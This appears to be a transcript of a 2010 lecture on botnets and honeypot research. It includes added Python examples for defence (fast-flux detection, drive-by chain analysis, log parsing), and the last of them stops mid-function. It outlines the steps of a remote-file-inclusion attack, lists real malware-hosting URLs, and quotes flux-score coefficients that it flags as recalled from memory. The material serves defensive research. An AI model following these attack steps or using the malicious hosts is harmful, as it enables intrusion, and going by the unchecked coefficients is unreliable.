2010-08-26 - TWSE (Taiwan Stock Exchange) - Honeypot systems and botnets (botnet and honeypot)

185 slides

[email protected] Botnet attacks and honeynet technology, Julia Yu-Chin Cheng (鄭毓芹), Information and Communication Security R&D Center, National Cheng Kung University

Upload: julia-yu-chin-cheng

Post on 18-Jul-2015

TRANSCRIPT

  • Page 1

    [email protected] (Julia Yu-Chin Cheng)

  • Page 2

    Speaker: Julia Cheng

    TWISC@NCKU; Honeynet Project (2010)

  • Page 3

    Outline

    The Honeynet Project

  • Page 5

    Instant messaging: MSN, Yahoo Messenger, QQ

  • Page 6

    2009

    Source: http://www.bnext.com.tw/article/view/cid/127/id/13177

  • Page 7

    Malware (e.g. hijacking)

    Word / PDF / Excel documents; patches (Patch)

  • Pages 8-10

    (figures only; no recoverable text)

  • Page 11

    Vulnerable Web Server -> 1. Phishing Site 2. Exploit Code (figure)

  • Page 13

    Instant messaging: MSN, Skype

    Phishing:

  • Page 14

    Social networks: Facebook, Plurk

  • Page 16

    Examples: PDF, Delta Airlines, PayPal

  • Page 17

    April 2009: DHL phishing e-mail

  • Page 18

    2009-11-30

  • Page 19

    MSN, Skype

  • Page 20

    Step 1: (Blocked)

    Step 2: MSN / Skype webcam

    Skype

  • Page 21

    Case 1: e-mail from "sysadmin" [[email protected]]

  • Page 22

    Case 2: MSN, Facebook

  • Page 23

    Simple and quick: botnet setup toolkits

  • Page 24

    Hacking is easy and cheap. You will be a victim anytime and anywhere. Hackers love your information, your computer, your network and your money. The hacking market is very mature.

  • Page 25

    Hacking Market

  • Page 26

    Seller: Bot

  • Pages 27-30

    (screenshots; no recoverable text)

  • Page 31

    XR BOTS .25 EACH

  • Page 32

    700 DDoSeR bots for selling - 153$ paypal ONLY

  • Page 34

    Sikandar's Private FUD Keylogger v1 Features:

  • Page 37

    The Honeynet Project

    What specific threats do computer networks face from hackers? Who is perpetrating these threats, and how? The Honeynet Project is an organization dedicated to answering these questions. It studies the bad guys and shares the lessons learned. The group gathers information by deploying networks (called honeynets) that are designed to be compromised.

  • Page 38

    The Honeynet Project

    The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.

  • Page 39

    Mission Statement: To learn the tools, tactics, and motives of the blackhat community, and share the lessons learned.

    Goals:

    - Awareness: to raise awareness of the threats that exist.

    - Information: to teach and inform about the threats.

    - Research: to give organizations the capabilities to learn more on their own.

  • Page 40

    The Honeynet Project History

    1999: started as a mailing list

    2000: Lance Spitzner founded the Honeynet Project

    As of 2010.07: 41 Honeynet Project chapters

  • Page 41

    The Honeynet Project History (timeline 1999-2009)

    Members organized in the Wargames mailing list; Lance Spitzner officially became the Honeynet Project; Research Alliance organized; Annual Workshop; funded Google Code Project; High-Interaction Honeywall CDROM ROO; Client Honeypot; Virtual Honeypot; GDH Project

  • Page 42

    Honeynet Project Organization

    Characteristics: non-profit (501(c)(3)) organization; trusted relationship for full members; works virtually around the world.

  • Page 43

    Activities

    KYE (Know Your Enemy) papers; Forensics Challenge; open source tools development; Global Distributed Honeynet (GDH II); Google Summer of Code (GSoC) project; annual closed workshop

  • Page 44

    Annual Workshop

    2009 Annual Workshop: 25-28 February 2009; 70 attendees (closed meeting); 15

    R&D; trusted relationship; hands-on training courses

    We are here! (photos from 2007 and 2009)

  • Page 45

    http://www.honeynet.org http://www.honeynet.org/project

  • Pages 47-49

    xxx (redacted): Bot, PHP Bot

  • Page 52

    Case 1: RFI (figure)

    Site A hosts proxy A / Bot -> compromise Web A -> malicious code / page; collects IP, e-mail, CPU, MSN (Web, SMTP)

    Malicious Web + RFI + Fast-Flux + Phishing

    2. Malware file server; SMTP server

    Malicious Web Sites B1, B2, B3 (3322.org); Phishing Web Sites C1, C2 (3322.org)

  • Page 53

    1. Dynamic DNS: xxx.8866.org / xxxx.3322.org

    2. Setup

    3. Fast-Flux

  • Page 54

    Exploit Code

  • Page 55

    Exploit Code (Cont.): JavaScript exploit code (malicious link): http://v.6t65r.cn/01/

  • Page 56

    Drive-by-Download

    HTML (browser, Flash, PDF)

  • Page 57

    Drive-by-download chain (figure): landing sites (malicious link) -> hopping site (obfuscated JavaScript, exploit code) -> download site (malware)

  • Page 58

    Client Honeypot

  • Page 59

    Thinking

    A lot of information is available to us: firewall, IPS, Nagios, system logs, ... authorized access, unauthorized connections, unusual connections, abnormal behaviors.

    However, what is the critical information for network administrators?

    To solve: finding a needle in a haystack. Good solution: honeypot & honeynet

  • Page 60

    What is a Honeypot?

    General purpose: deliberately deployed operating systems, services or vulnerabilities around your networks, intended to be probed and hacked.

    All data collected is of high value and unpolluted.

  • Page 61

    Honeypot

    Source: www.mtsc.com.tw/service11.htm

  • Page 62

    Honeyd; HIHAT; (Bot)

  • Page 63

    Example: Honeyd

    Internet -> Router -> 192.168.0.1 Linux, 192.168.0.2 FreeBSD, 192.168.0.3 Windows, 192.168.0.4 NetBSD; all emulated by one Honeyd host (192.168.0.0 network)

  • Page 64

    LSASS Vulnerability - MS04-011

    - MS04-011 (CVE-2003-0533): LSASRV.DLL

    - Exploited by W32.Gaobot.AFC / W32.Gaobot.AFJ / W32.Gaobot.AFW and W32.Sasser

    - Exploit code (fire-and-forget): the malicious payload compromises the machine: W32.Gaobot.AFC / W32.Gaobot.AFJ / W32.Gaobot.AFW, W32.Sasser

  • Page 65

    Nepenthes

    Collects autonomously spreading malware

    Low-interaction honeypot: http://nepenthes.carnivore.it, http://nepenthes.mwcollect.org. Developers: Paul Baecher, Markus Koetter

  • Page 66

    Emulated Vulnerable Services (Nepenthes vulnerability modules)

    vuln-asn1, vuln-bagle, vuln-dameware, vuln-dcom, vuln-msmq, vuln-mssql, vuln-mydoom, vuln-netbiosname, vuln-netdde, vuln-kuang2, vuln-lsass, vuln-optix, vuln-pnp, vuln-sasserftpd, vuln-upnp, vuln-veritas, vuln-wins, vuln-msdtc, vuln-ftpd, vuln-sub7, vuln-iis

  • Pages 67-69

    Example: Nepenthes process (screenshots)

  • Page 70

    Remote File Inclusion (RFI)

    RFI attacks against web servers

    Step 1: Try to inject testing code from A into the target web page; check that the injection succeeds ("Inject OK")

    Step 2: If it does, the hacker injects executable code from A to control host B

    Step 3: Exploit this host and obtain root access

    A: RFI attack site; B: target site

  • Page 71

    RFI (remote) attack procedure

    Step 1: Obtain RFI exploits, e.g. from http://milw0rm.org/exploits/

    Step 2: Use Google and an RFI scanner to find RFI-vulnerable targets

    Step 3: Inject PHP code hosted on RFI site A (drop site) into target B through the RFI flaw

    Step 4: Target B runs the injected PHP bot and joins the botnet

  • Page 72

    Example: exploit scanner (screenshot)

  • Page 73

    RFI: HIHAT (web honeypot)

    RFI drop site (web server hosting RFI scripts); the web honeypot HIHAT collects RFI drop sites

  • Page 74

    Remote File Inclusion: Why do hackers love vulnerable web servers? (Web servers are online services; 99% are online services.)

  • Page 79

    Honeynet

    Question: How can we collect more information and defend against the enemy, when we don't even know who the enemy is?

    Honeypot -> Honeynet

  • Page 80

    Honeynet (Cont.)

    A honeynet is a network of honeypots

  • Page 81

    Honeynet (Cont.)

    Honeynet: risks; vulnerabilities

  • Page 82

    Honeywall CDROM ROO

    The Honeynet Project's gateway for building a honeynet: https://projects.honeynet.org/honeywall/

  • Page 83

    Honeynet topology (figure)

    Internet -> router -> Hosts 1..N and Servers 1..N (production); HoneyWall (eth0, eth1, eth2) -> Honey Hosts 1..N (HoneyNet); Management Host

  • Page 84

    Honeywall CDROM ROO

    Data Capture: firewall log, Snort, Sebek

    Figure: INTERNET -> Honeywall -> Honeynet (Sendmail mail server, Oracle database server, DNS server, MS-SQL database server, Apache web server)

  • Page 85

    Honeywall CDROM ROO (Cont.)

    Data Capture:

    Data Control: restrict what the honeypots can do outbound

    Data Analysis:

  • Page 90

    Client Honeypot

    Client honeypots appeared in 2005 in response to browser exploits / client-side attacks: a client honeypot is an active security device in search of malicious servers that attack clients (the browser is the attack surface).

  • Page 91

    Client-Side Attack (Cont.)

    1. Exploit obfuscation (encoding, dynamic content with JavaScript, functions)

    2. Redirect: window.open(), window.location.href -> drive-by-download

    3. Exploit code against the browser

  • Page 92

    Client-Side Attack (Cont.)

    Client-side attack payloads: bot, proxy, spyware, keylogger, Browser Helper Objects (BHOs)

  • Page 93

    Capture-HPC

    - A client honeypot is an active security device/application in search of malicious servers that attack clients.

    - It visits servers and classifies them as benign or malicious.

    - Capture-HPC is a client honeypot for detecting malicious web servers (client-side attacks).

  • Page 94

    Client-Side Attack mitigation: disable JavaScript; use Mozilla Firefox with NoScript; Java, JavaScript

  • Page 95

    Honeypot types and timeline

    - Honeypot, 1998~: Honeyd, VoIP Pot, SpamPot, WirelessPot, Google Hack Pot, HIHAT (service emulation)

    - Honeynet, 2002~: Honeywall CD-ROM, HoneyStick

    - Client Honeypot, 2005~: HoneyC, Capture-HPC, HoneySpider, HoneyClient

    - Malware Honeypot, 2006~: Nepenthes, Honeytrap

    - GDH 2, 2004~: GDH1, GDH2 (Global Distributed Honeypot)

  • Page 96

    Honeynet Project tools by category (Network, Connection, Web App., Malware, Client-Side, Behavior)

    - Capture-BAT: Win32 operating system behavior analysis tool

    - Honeysnap: used for extracting and analyzing data (PCAP file)

    - Tracker: used to find domain resolutions and track hostname -> IP (DNS)

    - Pehunter: grabs Windows executables off the network (EXE file)

    - Honeymole: set up a honeyfarm: multiple sensors that redirect traffic to a centralized collection of honeypots

    - Honeywall CD ROM: create a network architecture for capturing attacks

    - Honeystick: both the Honeywall and honeypots on a single, portable device

    - Honeyd: low-interaction, used for capturing attacker activity

    - Honeytrap: capture novel attacks against network services

    - Google Hack Honeypot

    - HIHAT: transform a PHP application into a honeypot

    - Nepenthes: emulate known vulnerabilities to download malware

    - HoneyC: low-interaction client honeypot

    - Capture-HPC: high-interaction client honeypot

  • Page 97

    Deployment considerations (five items): IP / physical device (remaining text not recoverable)

  • Page 98

    HonEeeBox: Rapid Deployment of Many Distributed Low Interaction Malware Collectors

    Start project immediately (June 2009); deploy widely and internationally (130+)

  • Page 105

    Firewall / IPS

  • Page 107

    Botnet Infrastructure (figure)

    Botnet developer: 1. Register domain (xxxx.asia) 2. Set up botnet C&C server and fast-flux (xxxx.asia, several nodes) 3. Infected bots (controlled) 4. Sell botnets 5. Control botnets 6. Criminal activities inside botnets: YouTube, DDoS, exploits, download, phishing sites, Click, information stealer, DDoS exploits / new malware, SSH brute force, flooding (new target)

    Idea: 1. Monitoring inside the botnets 2. Collect pcap traffic and commands 3. Analyze and report incidents

  • Page 108

    Idea of Inside the Botnets (figure)

    Same infrastructure as page 107, with a feedback path added: pcap, bot IP, command

    Idea: 1. Monitoring inside the botnets 2. Collect pcap traffic and commands 3. Analyze and report incidents

  • Page 110

    Fast-Flux Domain Detection

  • Page 111

    Fast-Flux Domain Detection (Cont.)

    Fast-Flux: works like a content distribution network (CDN), but the nodes are bots of the botnet. The domain resolves to a rapidly changing set of bot IPs that front the botnet service, so the real servers and the botmaster stay hidden.

  • Page 112

    Bot (figure)

  • Page 113

    Fast-Flux Domain Detection: a hierarchical FF detection method

    Flux-score: Thorsten Holz et al., "Measuring and Detecting Fast-Flux Service Networks", Proceedings of the 15th Network & Distributed System Security Symposium (NDSS), 2008.

    Phase 1 (detect FF domains and CDNs): use the different behavioral conditions of FF to detect FF domains. If a domain satisfies more than 4 conditions, it is an ambiguous domain, which may be FF or a domain using a CDN.

    Phase 2 (detect the FF domain exactly): use the flux-score to separate true FF domains from the ambiguous domains.

  • Page 114

    Fast-Flux Domain Detection: CDN features: A records, ASN

  • Page 115

    Fast-Flux Domain Detection: A records, ASN, IP class-B distribution
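As an added example (not the speaker's code), the two-phase method of pages 113-115 implemented in Python over constructed DNS snapshots. Phase 1 counts behavioural conditions (short TTL, several A records per answer, many distinct A records, many distinct /16 prefixes, several ASNs, a change between lookups); the six conditions and their thresholds are assumptions, since the slides name none. A domain meeting more than four is ambiguous, and Phase 2 applies the linear flux-score of Holz et al. to separate fast-flux from CDN. The flux-score coefficients are reproduced from memory and marked as an assumption in the code; check them against the paper. ASN lookups are assumed to have been done before the data reaches this code.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass
class DnsSnapshot:
    """One resolution of a domain at one point in time (constructed data below)."""
    a_records: List[str]     # IPv4 addresses in the answer
    asns: List[int]          # origin ASN of each A record (assumed looked up elsewhere)
    nameservers: List[str]   # NS names of the domain
    ttl: int                 # TTL of the A records, seconds


@dataclass
class Domain:
    name: str
    snapshots: List[DnsSnapshot] = field(default_factory=list)

    def unique_a(self) -> Set[str]:
        return {ip for s in self.snapshots for ip in s.a_records}

    def unique_asns(self) -> Set[int]:
        return {asn for s in self.snapshots for asn in s.asns}

    def unique_ns(self) -> Set[str]:
        return {ns for s in self.snapshots for ns in s.nameservers}

    def unique_class_b(self) -> Set[str]:
        """Distinct /16 prefixes: the 'IP class-B distribution' feature of page 115."""
        return {".".join(ip.split(".")[:2]) for ip in self.unique_a()}


def phase1_conditions(d: Domain) -> Dict[str, bool]:
    """Behavioural conditions that fast-flux networks share with CDNs.
    The six conditions and their thresholds are assumptions for this example."""
    first = set(d.snapshots[0].a_records)
    last = set(d.snapshots[-1].a_records)
    return {
        "short_ttl": min(s.ttl for s in d.snapshots) <= 300,
        "many_a_per_answer": any(len(s.a_records) >= 3 for s in d.snapshots),
        "many_unique_a": len(d.unique_a()) >= 5,
        "many_class_b": len(d.unique_class_b()) >= 3,
        "many_asns": len(d.unique_asns()) >= 2,
        "ips_change_between_lookups": first != last,
    }


# Linear flux-score f(x) = w . (n_A, n_ASN, n_NS) + b of Holz et al. (NDSS 2008); f > 0 means
# fast-flux. Coefficients reproduced from memory (assumption): check them against the paper.
FLUX_WEIGHTS = (1.32, 18.54, 0.0)
FLUX_BIAS = -142.38


def flux_score(n_a: int, n_asn: int, n_ns: int) -> float:
    w_a, w_asn, w_ns = FLUX_WEIGHTS
    return w_a * n_a + w_asn * n_asn + w_ns * n_ns + FLUX_BIAS


def classify(d: Domain, min_conditions: int = 5) -> Tuple[str, float]:
    """Phase 1: a domain meeting fewer than min_conditions (page 113: 'more than 4') is benign.
    Phase 2: the remaining ambiguous domains are split into CDN and fast-flux by the flux-score."""
    satisfied = sum(phase1_conditions(d).values())
    score = flux_score(len(d.unique_a()), len(d.unique_asns()), len(d.unique_ns()))
    if satisfied < min_conditions:
        return "benign", score
    return ("fast-flux" if score > 0 else "cdn"), score


def build_samples() -> Dict[str, Domain]:
    """Constructed snapshots (not real measurements) for a static host, a CDN and a flux network."""
    ns = ["ns1.example.net", "ns2.example.net"]
    static = Domain("static.example", [
        DnsSnapshot(["203.0.113.10"], [64500], ns, 86400),
        DnsSnapshot(["203.0.113.10"], [64500], ns, 86400),
    ])
    # CDN-like: short TTL, several answers per lookup, a few /16s, but only two ASNs.
    cdn = Domain("cdn.example", [
        DnsSnapshot(["192.0.2.1", "192.0.2.2", "198.51.100.1", "198.51.100.2"],
                    [64501, 64501, 64502, 64502], ns, 20),
        DnsSnapshot(["192.0.2.3", "192.0.2.4", "203.0.113.1", "203.0.113.2"],
                    [64501, 64501, 64502, 64502], ns, 20),
    ])
    # Fast-flux-like: compromised hosts scattered over many /16s and seven ASNs.
    flux_ips = [f"10.{n}.{n}.{n}" for n in range(1, 13)]   # 12 IPs in 12 distinct /16s
    flux_asns = [65000 + (n % 7) for n in range(12)]        # 7 distinct ASNs
    flux = Domain("flux.example", [
        DnsSnapshot(flux_ips[:6], flux_asns[:6], ns, 180),
        DnsSnapshot(flux_ips[6:], flux_asns[6:], ns, 180),
    ])
    return {d.name: d for d in (static, cdn, flux)}


if __name__ == "__main__":
    for name, dom in build_samples().items():
        label, score = classify(dom)
        print(f"{name:15s} {label:10s} flux-score={score:8.2f} "
              f"conditions={sum(phase1_conditions(dom).values())}/6")
```

Running the block classifies the static host as benign, lets the CDN-like domain pass Phase 1 but leaves it below the flux threshold, and scores the flux-like domain positive. The CDN case is the reason Phase 1 alone is not enough: it satisfies every behavioural condition, and only the ASN spread separates it from a flux network.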

  • Page 116

    Inside the botnets: Methodology

    1. Collection

    Honeypot technology: 1. malware collection honeypot 2. malicious RFI honeypot 3. malicious web honeypot

    Honeypot tools: 1. Nepenthes 2. mwcollectd 3. Glastopf / HIHAT 4. Capture-HPC 5. PhoneyC

    2. Sample Analysis

    Sample analysis to extract C&C information (IP, nickname, password, channel, command)

    Analysis tools: 1. CWSandbox / Anubis 2. VirusTotal 3. libemu (shellcode) 4. Pkaii (PHP analyzer)

    3. Infiltration

    Send the bot to join the C&C server; collect commands, traffic and activities inside the C&C

    Monitoring tools: 1. rishi (bot traffic monitor) 2. infiltrator 3. XChat + VMware

  • Page 117

    Inside the botnets: Methodology (Cont.)

    4. Feedback

    Collect network pcap files; feed information back to the IRC server (command, bot IP, attacked targets)

    Feedback tools: 1. scripts by myself 2. IRC server 3. WeeChat

    5. Analysis

    Data analysis using a search engine tool; data visualization for pcap traffic analysis

    Analysis tools: 1. tshark 2. chaosreader 3. Splunk free version 4. Picviz

    6. Reporting

    Share data with trusted organizations

    Ticket system: 1. OTRS2 (not ready)

  • Page 118

    1. Collection (Cont.)

    Using honeypot technology to collect attack data and malicious samples

    Why do we use honeypots for data collection? Objective: identify infected hosts and capture malicious content. An infected host that exploits a given vulnerability will probe and attack a honeypot that emulates the same vulnerability.

  • Page 119

    1. Collection (Cont.)

    Honeypot design vs. purpose: ROO Honeywall (collect attack traffic and capture novel zero-day attacks); malware honeypot (emulate Windows vulnerabilities to collect malware); client honeypot (emulate browser behavior to detect malicious web content); RFI honeypot (emulate vulnerable web applications to collect RFI attacks)

    Honeypot deployment: ROO Honeywall with high-interaction WinXP honeypots; malware honeypots (3): Nepenthes / Dionaea / mwcollectd; client honeypots (3): Capture-HPC / PhoneyC; RFI honeypots (3): Glastopf

  • Page 120

    1. Collection (Cont.)

    Malware honeypot (Nepenthes, Dionaea, mwcollectd): malware samples. Malicious web pages (Capture-HPC, PhoneyC). RFI-compromised web (RFI scripts detection): the injected scripts form HTTP botnets (RFI bots); a web honeypot with emulated web application vulnerabilities collects PHP bots. Others: URL links, phishing.

  • Page 121

    1. Collection: Nepenthes / Dionaea / mwcollectd

    Capture autonomously spreading malware and extract the botnet C&C server from the samples

    Nepenthes / Dionaea; mwcollectd (Dionaea + honeytrap)

    Nepenthes: http://nepenthes.mwcollect.org Dionaea: http://dionaea.carnivore.it/ mwcollectd: http://code.mwcollect.org/projects/show/mwcollectd

  • Pages 122-124

    1. Collection (Cont.): samples identified by MD5; statistics 1: infected hosts, 2:, 3: (figures)

  • Page 125

    1. Collection: malicious JavaScript and shellcode; Capture-HPC drives a real browser against suspect (malicious) web sites

  • Page 126

    1. Collection (Cont.): Capture-HPC architecture (figure): clients 1..N visit the URL list (URL)

  • Page 127

    1. Collection: malicious web chain (Capture-HPC result)

    Landing Sites: http://www.bit361.com/ http://www.bit361.com/bbs

    Hopping Sites: http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E http://w.jsguangji.cn/03.htm http://w.jsguangji.cn/456.htm http://w.jsguangji.cn/1.jpg http://w.jsguangji.cn/2.jpg http://w.jsguangji.cn/dex.html http://w.jsguangji.cn/click.js http://js.tongji.linezing.com/1209024/tongji.js

    Download Sites: http://w.taogu.org.cn/a.exe http://w.taogu.org.cn/b.exe http://w.taogu.org.cn/c.exe http://w.taogu.org.cn/d.exe
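Added example, not part of the original slides: a small Python helper that normalises the URLs of a chain like the one above and groups them by role. It percent-decodes the host so the obfuscated hopping URL (the %77%2E... form) compares equal to w.jsguangji.cn, flags any URL carrying percent-encoding inside the host (there is no legitimate reason for it), and lists the download hosts. Role labels are taken as input exactly as the slide presents them; the code does not try to infer roles.

```python
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote, urlsplit

ROLES = ("landing", "hopping", "download")


def normalise_url(url: str) -> str:
    """Percent-decode host and path so an obfuscated URL compares equal to its plain form."""
    p = urlsplit(url)
    host = unquote(p.netloc).lower()
    path = unquote(p.path) or "/"
    return f"{p.scheme}://{host}{path}" + (f"?{p.query}" if p.query else "")


def has_encoded_host(url: str) -> bool:
    """Percent-encoding inside the host part has no legitimate use and is an obfuscation marker."""
    return "%" in urlsplit(url).netloc


def chain_summary(observed: List[Tuple[str, str]]) -> Dict[str, object]:
    """observed: (role, url) pairs as a client honeypot records them while following the chain.
    Returns the distinct hosts per role, the obfuscated URLs seen and the normalised download URLs."""
    hosts: Dict[str, Set[str]] = {r: set() for r in ROLES}
    obfuscated: Set[str] = set()
    downloads: Set[str] = set()
    for role, url in observed:
        if role not in hosts:
            raise ValueError(f"unknown role {role!r}")
        norm = normalise_url(url)
        hosts[role].add(urlsplit(norm).hostname or "")
        if has_encoded_host(url):
            obfuscated.add(url)
        if role == "download":
            downloads.add(norm)
    return {"hosts": hosts, "obfuscated": sorted(obfuscated), "downloads": sorted(downloads)}


# The chain listed on page 127 as Capture-HPC observed it: landing = the compromised site the
# victim visited, hopping = redirect/exploit stage, download = the malware host.
PAGE_127_CHAIN: List[Tuple[str, str]] = [
    ("landing", "http://www.bit361.com/"),
    ("landing", "http://www.bit361.com/bbs"),
    ("hopping", "http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E"),
    ("hopping", "http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E"),
    ("hopping", "http://w.jsguangji.cn/03.htm"),
    ("hopping", "http://w.jsguangji.cn/456.htm"),
    ("hopping", "http://w.jsguangji.cn/1.jpg"),
    ("hopping", "http://w.jsguangji.cn/2.jpg"),
    ("hopping", "http://w.jsguangji.cn/dex.html"),
    ("hopping", "http://w.jsguangji.cn/click.js"),
    ("hopping", "http://js.tongji.linezing.com/1209024/tongji.js"),
    ("download", "http://w.taogu.org.cn/a.exe"),
    ("download", "http://w.taogu.org.cn/b.exe"),
    ("download", "http://w.taogu.org.cn/c.exe"),
    ("download", "http://w.taogu.org.cn/d.exe"),
]

if __name__ == "__main__":
    summary = chain_summary(PAGE_127_CHAIN)
    for role in ROLES:
        print(f"{role:9s}: {sorted(summary['hosts'][role])}")
    print("obfuscated:", summary["obfuscated"])
    print("downloads :", summary["downloads"])
```

Note that the landing host is the compromised legitimate site, so the actionable indicators for blocking are the hopping and download hosts, and a hop-stage host that is a third-party analytics counter (the tongji.js line) still needs a human look before it goes on a blocklist.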

  • Page 128

    Capture-HPC behaviour log (Cont.)

    "registry","5/8/2009 18:17:38.333","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile","-1"
    "registry","5/8/2009 18:17:38.521","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete","-1"
    "process","5/8/2009 18:17:39.568","C:\Program Files\Internet Explorer\IEXPLORE.EXE","created","1624","C:\WINDOWS\system32\wscript.exe"

    Text rendering of the log:

    registry: SetValueKey 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> -1 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile
    registry: SetValueKey 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> -1 HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\
    registry: SetValueKey 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> -1 HKCU\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete
    process: created 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> C:\WINDOWS\system32\wscript.exe 3072
    process: terminated 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> C:\WINDOWS\system32\wscript.exe 3072
    process: created 1340 C:\Program Files\Internet Explorer\IEXPLORE.EXE -> C:\WINDOWS\system32\cmd.exe 3892
    process: created 3892 C:\WINDOWS\system32\cmd.exe -> C:\WINDOWS\system32\cmd.exe 3016
    process: created 3016 C:\WINDOWS\system32\cmd.exe -> C:\Documents and Settings\HPC\Local Settings\Temporary Internet Files\Content.IE5\8Y7MSOWW\alg3[1].exe 2192
    registry: SetValueKey 784 C:\WINDOWS\system32\notepad.exe -> -1 HKCU\Software\Microsoft\Notepad\lfEscapement
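Added example (not Capture-HPC's own tooling and not the speaker's scripts): Python that parses the quoted CSV form of the log above and reconstructs the process chain from the browser outward, which is the evidence that turns "site visited" into "site is malicious". Rows are read as type, timestamp, acting process, action, then child PID and image for process events; that the fifth field of a "created" row is the child PID is my reading of the slide, not documented there. The sample log reproduces the slide's CSV rows and adds constructed rows for the cmd.exe -> alg3[1].exe steps the slide shows only in its text rendering, so it is not a real capture.

```python
import csv
import io
from dataclasses import dataclass
from typing import List

BROWSERS = {"iexplore.exe", "firefox.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}


@dataclass
class Event:
    kind: str      # "process", "registry" or "file"
    time: str
    actor: str     # process that performed the action
    action: str    # e.g. "created", "SetValueKey"
    arg1: str      # child pid for process events, key path for registry events
    arg2: str      # child image path for process events, value for registry events


def parse_capture_log(text: str) -> List[Event]:
    """Parse Capture-HPC's quoted, comma-separated behaviour log; malformed rows are skipped."""
    return [Event(*row) for row in csv.reader(io.StringIO(text)) if len(row) == 6]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_chain(events: List[Event]) -> List[str]:
    """Follow process creations outward from the browser and return the images it (transitively)
    started, in log order. In a clean Capture-HPC run this list is empty."""
    tainted = set(BROWSERS)
    chain: List[str] = []
    for e in events:
        if e.kind == "process" and e.action == "created" and basename(e.actor) in tainted:
            child = basename(e.arg2)
            chain.append(child)
            tainted.add(child)
    return chain


def find_suspicious(events: List[Event]) -> List[str]:
    """Two rules a browser should never trigger: spawning a script host, and running a binary
    out of the browser cache."""
    findings = []
    for e in events:
        if e.kind != "process" or e.action != "created":
            continue
        parent, child = basename(e.actor), basename(e.arg2)
        if parent in BROWSERS and child in SCRIPT_HOSTS:
            findings.append(f"{e.time}: browser spawned {child} (pid {e.arg1})")
        if "\\temporary internet files\\" in e.arg2.lower() and child.endswith(".exe"):
            findings.append(f"{e.time}: {parent} executed dropped binary {e.arg2}")
    return findings


# Page 128's CSV rows, extended with constructed rows for the cmd.exe -> alg3[1].exe steps.
SAMPLE_LOG = r'''
"registry","5/8/2009 18:17:38.333","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile","-1"
"registry","5/8/2009 18:17:38.521","C:\Program Files\Internet Explorer\IEXPLORE.EXE","SetValueKey","HKCU\Software\Microsoft\Internet Explorer\Main\NotifyDownloadComplete","-1"
"process","5/8/2009 18:17:39.568","C:\Program Files\Internet Explorer\IEXPLORE.EXE","created","1624","C:\WINDOWS\system32\wscript.exe"
"process","5/8/2009 18:17:40.102","C:\Program Files\Internet Explorer\IEXPLORE.EXE","created","3892","C:\WINDOWS\system32\cmd.exe"
"process","5/8/2009 18:17:40.337","C:\WINDOWS\system32\cmd.exe","created","3016","C:\WINDOWS\system32\cmd.exe"
"process","5/8/2009 18:17:40.590","C:\WINDOWS\system32\cmd.exe","created","2192","C:\Documents and Settings\HPC\Local Settings\Temporary Internet Files\Content.IE5\8Y7MSOWW\alg3[1].exe"
"registry","5/8/2009 18:17:41.001","C:\WINDOWS\system32\notepad.exe","SetValueKey","HKCU\Software\Microsoft\Notepad\lfEscapement","-1"
'''

if __name__ == "__main__":
    evs = parse_capture_log(SAMPLE_LOG)
    print("process chain from browser:", " -> ".join(process_chain(evs)))
    for finding in find_suspicious(evs):
        print(finding)
```

The registry rows are kept in the parse but not used by the rules; the `.js` file-association writes in the slide are side effects of the page handing a script to wscript.exe, and the notepad row shows why matching on the actor matters: it is unrelated activity on the same machine.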

  • Page 129

    JScript at http://w.jsguangji.cn/03.htm

  • Page 130

    PhoneyC: deobfuscates obfuscated JavaScript and extracts the shellcode

  • Pages 131-132

    Shellcode: heap spray / buffer overflow; util.printf function triggered shellcode

  • Page 133

    1. Collection: RFI Introduction

    Remote File Inclusion (RFI): RFI attacks against web servers. Why do hackers love vulnerable web servers? (Web servers are online services; 99% are online services.)

  • Pages 134-136

    1. Collection: RFI Scripts (exploit codes) (screenshots)
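As an added example for the RFI attack procedure on pages 70-71 and the RFI collection on pages 133-136 (not the speaker's code, and not HIHAT or Glastopf), Python that inspects Apache access-log lines for the signature of an RFI attempt: a request parameter whose decoded value is a remote URL, usually with a trailing "?" or a null byte so that the application's appended suffix is ignored, and typically pointing at PHP code disguised under a .txt or image extension. The log lines are constructed (documentation IP ranges); the hosts serving the include are the drop sites that a web honeypot collects.

```python
import re
from typing import Dict, List, Optional, Set
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def rfi_hint(value: str) -> Optional[str]:
    """Tricks RFI payloads use so the application's own appended suffix (e.g. '.php') is ignored."""
    if value.endswith("?"):
        return "trailing '?' turns the appended suffix into a query string"
    if "\x00" in value:
        return "null byte truncates the include path"
    path = urlsplit(value).path.lower()
    if path.endswith((".txt", ".gif", ".jpg")):
        return "PHP code disguised under a non-script extension"
    return None


def inspect_line(line: str) -> List[Dict[str, object]]:
    """Return one finding per request parameter whose decoded value is a remote URL."""
    m = LOG_RE.match(line)
    if not m:
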